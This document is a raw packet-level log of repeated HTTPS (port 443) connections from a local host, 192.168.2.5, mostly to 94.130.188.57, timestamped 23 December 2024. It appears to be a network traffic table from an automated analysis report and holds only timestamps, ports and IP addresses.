                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:14.044318914 CET49953443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:21.543579102 CET4434997694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:21.580202103 CET4434997494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:21.580285072 CET4434997494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:21.580442905 CET49974443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:21.580442905 CET49974443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:21.584413052 CET49974443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:21.584458113 CET4434997494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.148561954 CET49983443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.148638010 CET4434998394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.148792028 CET49983443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.149153948 CET49983443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.149173021 CET4434998394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.356369019 CET49878443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.356379032 CET4434987823.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.356440067 CET49879443192.168.2.523.209.72.7
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.356506109 CET4434987923.209.72.7192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.600440979 CET4434997694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.600496054 CET49976443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.600508928 CET4434997694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.600534916 CET4434997694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.600548983 CET49976443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.600575924 CET49976443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.601435900 CET49976443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:22.601455927 CET4434997694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:23.168622017 CET49990443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:23.168673992 CET4434999094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:23.168745995 CET49990443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:23.169089079 CET49990443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:23.169097900 CET4434999094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:23.559807062 CET4434998394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:23.559876919 CET49983443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:23.560514927 CET49983443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:23.560528994 CET4434998394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:23.562944889 CET49983443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:23.562958002 CET4434998394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:23.562983036 CET49983443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:23.562990904 CET4434998394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.579363108 CET4434999094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.579457045 CET49990443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.580131054 CET49990443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.580144882 CET4434999094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.582484961 CET49990443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.582500935 CET4434999094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.582521915 CET49990443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.582530975 CET4434999094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.587184906 CET4434998394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.587256908 CET4434998394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.587296009 CET49983443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.587316990 CET49983443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.588449955 CET49983443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.588462114 CET4434998394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.769119978 CET4434990623.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.769212008 CET4434990623.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.769268036 CET49906443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.819997072 CET4434990723.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.820089102 CET4434990723.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:24.820226908 CET49907443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:25.211668015 CET49995443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:25.211718082 CET4434999594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:25.211807966 CET49995443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:25.212126017 CET49995443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:25.212146044 CET4434999594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:25.614552021 CET4434999094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:25.614640951 CET4434999094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:25.614669085 CET49990443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:25.614701033 CET49990443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:25.615916014 CET49990443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:25.615941048 CET4434999094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:26.027251005 CET4434991623.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:26.027337074 CET49916443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:26.231591940 CET49997443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:26.231637955 CET4434999794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:26.231714964 CET49997443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:26.232052088 CET49997443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:26.232063055 CET4434999794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:26.615514040 CET4434999594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:26.615576982 CET49995443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:26.616020918 CET49995443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:26.616031885 CET4434999594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:26.618451118 CET49995443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:26.618468046 CET4434999594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:26.618490934 CET49995443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:35.707595110 CET50021443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:35.708340883 CET50021443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:35.708353043 CET4435002194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:35.710253000 CET50021443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:35.710259914 CET4435002194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:35.710289955 CET50021443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:35.710295916 CET4435002194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.723272085 CET4435002294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.723359108 CET50022443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.724939108 CET50022443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.724963903 CET4435002294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.726772070 CET50022443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.726797104 CET4435002294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.726819038 CET50022443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.726830006 CET4435002294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.729531050 CET4435002194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.729619980 CET4435002194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.729650974 CET50021443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.729676962 CET50021443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.730560064 CET50021443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.730577946 CET4435002194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.360544920 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.360588074 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.360645056 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.360959053 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.360971928 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.720319986 CET4435002294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.720395088 CET4435002294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.720422983 CET50022443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.720510960 CET50022443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.721324921 CET50022443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.721369028 CET4435002294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.355408907 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.355458975 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.355523109 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.355782986 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.355792999 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.759879112 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.759936094 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.770418882 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.770428896 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.772239923 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.772247076 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.772278070 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.772284031 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.753957987 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.754096985 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.756725073 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.756733894 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.759232044 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.759237051 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.759280920 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.759284973 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.769187927 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.769260883 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.769262075 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.769309044 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.770459890 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.770474911 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.355803013 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.355910063 CET4435004194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.356009960 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.356292963 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.356328964 CET4435004194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.780539989 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.780622959 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.780756950 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.781157970 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.784573078 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.784636021 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.374176025 CET50042443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.374224901 CET4435004294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.374300003 CET50042443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.374557972 CET50042443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.374568939 CET4435004294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.769128084 CET4435004194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.769308090 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.769944906 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.769974947 CET4435004194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.780463934 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.780487061 CET4435004194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.780525923 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:49.895173073 CET50061443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:49.896181107 CET50061443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:49.896203041 CET4435006194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.435736895 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.435786009 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.435878992 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.436217070 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.436229944 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.836570024 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.836667061 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.837466955 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.837481022 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.839828014 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.839850903 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.839879036 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.839886904 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.931493044 CET49908443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.931504011 CET44349908204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.054852962 CET49909443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.054872036 CET44349909204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.832015991 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.832076073 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.833560944 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.833581924 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.836462975 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.836481094 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.836503983 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.836515903 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.885555983 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.885634899 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.885648012 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.885684967 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.885804892 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.885869980 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.886718988 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.886745930 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.445044041 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.445143938 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.445236921 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.445560932 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.445605993 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.881607056 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.881685972 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.881716013 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.881738901 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.882736921 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.882750988 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.465558052 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.465596914 CET4435008194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.465663910 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.465939999 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.465950966 CET4435008194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.848685980 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.848778963 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.849473000 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.849502087 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.851603985 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.851618052 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.851659060 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.851676941 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.865581036 CET4435008194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.865677118 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.866170883 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.866199970 CET4435008194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.868177891 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.868182898 CET4435008194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.868211985 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.868217945 CET4435008194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.879517078 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.879592896 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.879592896 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.879664898 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.880481005 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.880518913 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.924274921 CET49906443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.924333096 CET49907443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.924350977 CET4434990623.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.924391031 CET4434990723.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.258764982 CET50084443192.168.2.523.44.201.40
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.258805037 CET4435008423.44.201.40192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.258897066 CET50084443192.168.2.523.44.201.40
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.259160042 CET50084443192.168.2.523.44.201.40
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.941178083 CET4435010594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.944389105 CET50105443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.944389105 CET50105443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.944396973 CET4435010594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:02.944411039 CET4435010594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.981548071 CET4435010594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.981627941 CET4435010594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.981749058 CET50105443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.982839108 CET50105443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.982876062 CET4435010594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.989926100 CET4435011094.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.990015030 CET50110443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:59:03.990674973 CET50110443192.168.2.594.130.188.57
